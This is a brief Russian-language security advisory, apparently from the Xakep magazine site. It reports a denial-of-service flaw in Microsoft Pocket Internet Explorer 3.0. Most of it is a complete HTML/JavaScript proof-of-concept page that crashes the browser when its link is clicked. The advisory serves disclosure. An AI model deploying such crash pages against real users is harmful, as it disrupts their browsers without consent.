DoS против Microsoft Pocket Internet Explorer

Рекомендуем почитать:

Xakep #304. IP-камеры на пентестах

• Содержание выпуска
• Подписка на «Хакер»-60%

Обнаруженная уязвимость позволяет злонамеренной Web странице, содержащей некорректный JavaScript код, аварийно завершить работу Microsoft Pocket Internet Explorer. Пример: 

<html> 
<head> 
<title>Crash PIE</title> 
<script language="Javascript"> 
function displayPage(page){ 
if(page=="onload"){ 
main.innerHTML="<a href=\"#\" onClick=\"displayPage('crash');\">Crash 
me</a>"; 
} 
if(page=="crash"){ 
main.innerHTML="<a href=\"#\" onClick=\"displayPage('crash');\">You are 
going down!</a>"; 
} 
} 
</script> 
</head> 
<body onLoad="displayPage('onload');"> 
<hr> 
<span id="main"></span> 
</body></html> 

Уязвимость обнаружена в Microsoft Pocket Internet Explorer 3.0.